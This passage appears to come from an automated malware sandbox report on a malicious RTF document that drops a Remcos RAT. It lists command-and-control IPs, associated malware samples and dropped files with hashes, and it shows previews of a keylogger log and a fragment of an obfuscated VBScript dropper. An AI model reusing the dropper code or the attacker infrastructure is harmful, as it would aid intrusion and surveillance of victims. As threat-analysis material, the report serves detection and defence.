                              createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AS-COLOCROSSINGUSRFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                              • 107.175.229.136
                              NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                              • 198.46.176.133
                              RFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                              • 107.175.229.136
                              PI-002312.xlsGet hashmaliciousRemcosBrowse
                              • 172.245.123.11
                              SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
                              • 198.46.176.133
                              Purchase order.xlsGet hashmaliciousRemcosBrowse
                              • 198.46.176.133
                              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                              • 107.173.160.137
                              loveyou.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 23.94.247.40
                              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                              • 107.173.160.137
                              xSYFgHIHTv.rtfGet hashmaliciousUnknownBrowse
                              • 198.46.178.229
                              WIFIKU-AS-IDPTWifikuIndonesiaIDPI-002312.xlsGet hashmaliciousRemcosBrowse
                              • 103.253.17.222
                              Purchase Order.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • 103.253.17.222
                              JPEG00774533.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 103.253.17.222
                              CamScanner0091.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 103.253.17.222
                              PI00232.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • 103.253.17.222
                              Spare_part_list.xlsGet hashmaliciousLokibotBrowse
                              • 103.253.17.249
                              57m#U00b3_LPG_SEMI_TRAILER_7_NOS.pdf.xlsGet hashmaliciousAgentTeslaBrowse
                              • 103.253.17.249
                              EUCjx7V4L9.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 116.0.5.90
                              ATOM86-ASATOM86NL17222595947848c557577cb7231356008886f5096f576098b0877ccefa60e0124d9938bde0501.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              PI-002312.xlsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              Purchase order.xlsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              17222151664c1cf157f4e60a5db7bff76e80474d27d5be3b770f3ff1dd50ca91ddde2e4170122.dat-decoded.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              SKqrekfUiW.exeGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • 178.237.33.50
                              createactiveimagesbeautygirlfrnd.gIF.vbsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              screensimplethingstohandlecream.gIF.vbsGet hashmaliciousRemcosBrowse
                              • 178.237.33.50
                              AS-COLOCROSSINGUSRFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                              • 107.175.229.136
                              NySTAwCpzK.rtfGet hashmaliciousRemcosBrowse
                              • 198.46.176.133
                              RFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                              • 107.175.229.136
                              PI-002312.xlsGet hashmaliciousRemcosBrowse
                              • 172.245.123.11
                              SATIN ALMA EMR#U0130.xlsGet hashmaliciousRemcosBrowse
                              • 198.46.176.133
                              Purchase order.xlsGet hashmaliciousRemcosBrowse
                              • 198.46.176.133
                              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                              • 107.173.160.137
                              loveyou.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                              • 23.94.247.40
                              file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                              • 107.173.160.137
                              xSYFgHIHTv.rtfGet hashmaliciousUnknownBrowse
                              • 198.46.178.229

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\remcos\logs.dat

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):512
                              Entropy (8bit):3.5077736656901792
                              Encrypted:false
                              SSDEEP:12:6lVsL8ec0WQ7yp50AtN25MMy4tN25MMyHW+:6/sFc0WaE50At/My4t/MyHW+
                              MD5:3E51DFA6C580AA40C357208CE839F992
                              SHA1:A5B0D629BF23F371A2917250A413361189E5E448
                              SHA-256:FBA6E48805BDC07F5D9722D15B931771459396C446F733CA7E1F57F7BEE7FDA6
                              SHA-512:FE2A430883C85D5FAE5C1BEA3BE53D9BA36A81E34EA361473D91347F4BCB66A7F5367930689A5C43568FB725F4515DAC96F0C2CDD4A7E5FBAD90AC0ACF6A9939
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                              Reputation:low
                              Preview:....[.2.0.2.4./.0.7./.2.9. .1.0.:.1.5.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.4.v.z.w.J.T.Z.b.w.T. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4760
                              Entropy (8bit):4.834060479684549
                              Encrypted:false
                              SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                              MD5:838C1F472806CF4BA2A9EC49C27C2847
                              SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                              SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                              SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):0.34726597513537405
                              Encrypted:false
                              SSDEEP:3:Nlll:Nll
                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:@...e...........................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weseethesimplethingsalwaystoget[1].gif

                              Download File
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):414990
                              Entropy (8bit):3.5776427335218326
                              Encrypted:false
                              SSDEEP:3072:sHGowfvYF7hNe4VTdRnTT8w4TWIdqruoJTgCOpBKEMDS7opi70cmt07CjeJIvv:OwfvYFqdqR
                              MD5:C7F6CF5DA3192C2CAE7D911EE67F6620
                              SHA1:9502C8B3D6FAAFC64C45C7731CA9528DB6B7ED76
                              SHA-256:8EC7A5B08CAF43325E9C75D3E9397418ABE644CFC39185F5BC0AC5A9E954F858
                              SHA-512:CFBA63F83B3667C80E7615C676CF858B7B816E9202B4C2F6FCBD86A9D54BB29E959B6B4E791C9ADF00B43A278ECCE8D4824F214224DE15708D3DE5D4F5E7130A
                              Malicious:false
                              Reputation:low
                              Preview:..d.i.m. .i.l.l.a.c.e.r.a.d.o.E.E. .....i.l.l.a.c.e.r.a.d.o.E. .=. .r.a.n.i.n.o.........a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):962
                              Entropy (8bit):5.012309356796613
                              Encrypted:false
                              SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                              MD5:14B479958E659C5A4480548A393022AC
                              SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                              SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                              SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                              Malicious:false
                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):8192
                              Entropy (8bit):4.940690864758113
                              Encrypted:false
                              SSDEEP:96:JNmMPo5fQEMVjnLPHoYTgp7gU45fQmMVjnLPHoYTgp:JVP8QB5/oMOfsQf5/oMO
                              MD5:57704A7FC1448F3AB2FF3474F0AF9E63
                              SHA1:584DBA008ABDCF8B6FD2AB6E8128C3ECE8F86E4A
                              SHA-256:F339F96133748771CDD2F7F6FC88DD0E3765E717D9693DFB8C38972BE39B6CF2
                              SHA-512:FCF78B23B072AF848A8B0D013D2F39FB377956E75A80FB431E37B6F49B3D95F8CE61A8DDD2BD2FAE598D6F1F98B7E1EEB53054DBF95F675C12C89F55FD356EA8
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A11CDD9-7ADD-40DB-AE85-9116E67BF7A4}.tmp

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):3.4306375443017565
                              Encrypted:false
                              SSDEEP:96:kzuywIuEfNVI/zjpKSp30DDcohcqrew1F9+QQ+b8s4edtQ4gljlCAxYoHCCwCQuA:kJ/uEvyXZKDD1ZrFF9vn8srXglj1xYoK
                              MD5:7B77A13E831BF00230835CD08F51405A
                              SHA1:41AC03C0F84255A4EDEEF4EFCC94820E5824FE7D
                              SHA-256:D1D8CDBF8F64D2AF7FCF37F8C7CAB307187C331251D6221851E8C0AEA138393B
                              SHA-512:12005CDA9EE724B0DFBD53A90B9042C6707CD55927C58456FE99D0E9F172175CB5AAAB44D1339234295FB2BF54A52D08D9F12F83B9AA091C89808B4A6E0D900F
                              Malicious:false
                              Preview:............1.9.4.9.1.3.3.4...(.?.-.*.4.|.].:.4.8.1.6.2.>.!...$.?.~...*.0.(.8.8.;.~.?.<.$.`.^.$.;...+./.0.*...2.1.~._.*.>.`.@._.&.6.?.%.|.:.*.'.3.4.*.,.7.|./.^.,.4.?.+.%.?.=.<.0...`.0.9.2.4.~.&.?.1...5.:.*.?...0.2.$.0.-.?...5.%.<.*.).[.9.|.@.<.?.;.?.<._.;.7.2.?.(.'.?.;.0.?.5.+.`.3.$.`.>.!.7.?.7.|.6.(.?.[.1...3.~.?...2.:.>.>.%.;.$.,.(.).9.-.`.=.5.~.9.#.0.;.`./.-.:.3...;.~.`.+.1.,.0...%.3.5.%.^.].%.<...^.;.5.9.!.4.5.].8./...'.[.-.%.(...]./.>.?.6.3.].?.+.'.!.<.^.>.?.(.&.#.|.?.[.'.,.0.3.?.'.|.;.0.7...+.,.4.-.^.+.'.?.9...?.1.<...*.?.7.?.#.=._.+...~.?./.....;./.0...[.?.?.?.[./...3...=.1.~...#.:.9.~.?.?.:.+.<.0.#.7...'.>.:.~...5.!.5.-.'.^.)./.'.?.2.>.0.?...'.,.<.?.=..._.!.8.5.9./...~.&.?.&.?.0.5...;.-.&.<.=.%.|...!.;.9.@.4.=.?.?.~.6././...6.?.).=.+.!.3.?.;.'.%.....;.,.6._.'.?.=.~.<.2.!.6.?.%.<.~.>.@.).'.7.@.%._.^.'.!.@.*.(.?.7.#.).).6.[.+.].@.?.%.`.>.`...#.~.8...5.?.+.7.?.~.7.&.%.+.8.$.(.).|.1.8.?.&.=.=.?.$.?.6...&.#...?.[.3.~.&.?.7.0.1.6.>.$.?.@.#...?.]...~.?.#.4.,.8.<._.6.?.<...].%._.4.7.%.

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5878D53A-917D-4F0D-8E7A-DADC951BC237}.tmp

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1024
                              Entropy (8bit):0.05390218305374581
                              Encrypted:false
                              SSDEEP:3:ol3lYdn:4Wn
                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\qr14btjq.eoj.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1

                              C:\Users\user\AppData\Local\Temp\vvsr3mtf.gug.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Preview:1

                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4vzwJTZbwT.LNK

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Mon Jul 29 13:14:59 2024, length=80092, window=hide
                              Category:dropped
                              Size (bytes):1014
                              Entropy (8bit):4.5770780502304875
                              Encrypted:false
                              SSDEEP:12:82nFgXg/XAlCPCHaXAyB6B/5YXX+WN1UquoNIeicvb483AY04sODtZ3YilMMEpxK:8u/XTwyA4Xjsne7DfDv3qBk7N
                              MD5:247D9BA9DC8A4DF1641E0AA686C04C19
                              SHA1:965EF12A2519503E2357CD12381045A72B56B7D4
                              SHA-256:EDB6A3A0A334F769D93AC7E303B25F022C9CCBAADA747B1C32D80C93B7703499
                              SHA-512:2A87697441A6BB0EA539F613D278AB379819CE7650DC3185280FAA05AEA5D2022685A83D954F627D8514B67BD1EBFF227E05389CA7B5FC1F0536141374AC3641
                              Malicious:false
                              Preview:L..................F.... .....s.r.....s.r...cn......8...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.q..user.8......QK.X.X.q*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..8...X.q .4VZWJT~1.RTF..J.......WD..WD.*.........................4.v.z.w.J.T.Z.b.w.T...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\4vzwJTZbwT.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.v.z.w.J.T.Z.b.w.T...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Generic INItialization configuration [folders]
                              Category:dropped
                              Size (bytes):55
                              Entropy (8bit):4.654086986251931
                              Encrypted:false
                              SSDEEP:3:HYEQLp6lm46QLp6lv:HZQd1QdI
                              MD5:FC579A0462679AE27CD32010872218C9
                              SHA1:C52A9A2AEB15F1D027F8A26E31B878DC7736EF07
                              SHA-256:B6CC1892EE65BF5DD4B553F99660DA11B7B06758BAC8B5205125C8915300E534
                              SHA-512:62591D7DB0B29584670F8B0C9645DDAFFF0053C39CD17B082A03F9AD6EF9E82B104C349B16A5C6BD894D39C6DB3B9DF32B4BD5DD12B2EA62306927531BDE4997
                              Malicious:false
                              Preview:[misc]..4vzwJTZbwT.LNK=0..[folders]..4vzwJTZbwT.LNK=0..

                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):2.4797606462020307
                              Encrypted:false
                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                              SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                              Malicious:false
                              Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                              C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS

                              Download File
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):414990
                              Entropy (8bit):3.5776427335218326
                              Encrypted:false
                              SSDEEP:3072:sHGowfvYF7hNe4VTdRnTT8w4TWIdqruoJTgCOpBKEMDS7opi70cmt07CjeJIvv:OwfvYFqdqR
                              MD5:C7F6CF5DA3192C2CAE7D911EE67F6620
                              SHA1:9502C8B3D6FAAFC64C45C7731CA9528DB6B7ED76
                              SHA-256:8EC7A5B08CAF43325E9C75D3E9397418ABE644CFC39185F5BC0AC5A9E954F858
                              SHA-512:CFBA63F83B3667C80E7615C676CF858B7B816E9202B4C2F6FCBD86A9D54BB29E959B6B4E791C9ADF00B43A278ECCE8D4824F214224DE15708D3DE5D4F5E7130A
                              Malicious:true
                              Preview:..d.i.m. .i.l.l.a.c.e.r.a.d.o.E.E. .....i.l.l.a.c.e.r.a.d.o.E. .=. .r.a.n.i.n.o.........a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.1._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.2._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".L._.H.e.l.p.A.l.i.a.s._.0.0.3._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.4._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.6._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.7._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.i.a.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .i.l.l.a.c.e.r.a.d.o.E. .&. ._.....a.n.a.d.a.r.(.".X._.H.e.l.p.A.l.

                              C:\Users\user\Desktop\4vzwJTZbwT.rtf (copy)

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                              Category:dropped
                              Size (bytes):41744
                              Entropy (8bit):5.189145922463506
                              Encrypted:false
                              SSDEEP:384:323tHbrN79ozVzEFH3W2j2xYuWXmddk9hZUPgRA5a5jkay95si6rGsNAYAXJqskN:323b3W2G3kGoRAk/y95AhAZqCO
                              MD5:E2C840CDB6F343D7067F7C9ABCBBC900
                              SHA1:D67DE2D3EEC584EA31AB5F4C41621108B4411151
                              SHA-256:04EDCBB532111FD4CBBE536774FC33CEAEB5C436B5F96D732A011F03B8729AF0
                              SHA-512:6C60906AC4716A99EDC721F3C60377BE92717B6256ADC877FEB872D33C33E816FABFB464FF8FDE305B8734F73CC06449190CC6CF9E3ACB6BA8CA67F24C2F149F
                              Malicious:true
                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New

                              C:\Users\user\Desktop\~$zwJTZbwT.rtf

                              Download File
                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):162
                              Entropy (8bit):2.4797606462020307
                              Encrypted:false
                              SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                              MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                              SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                              SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
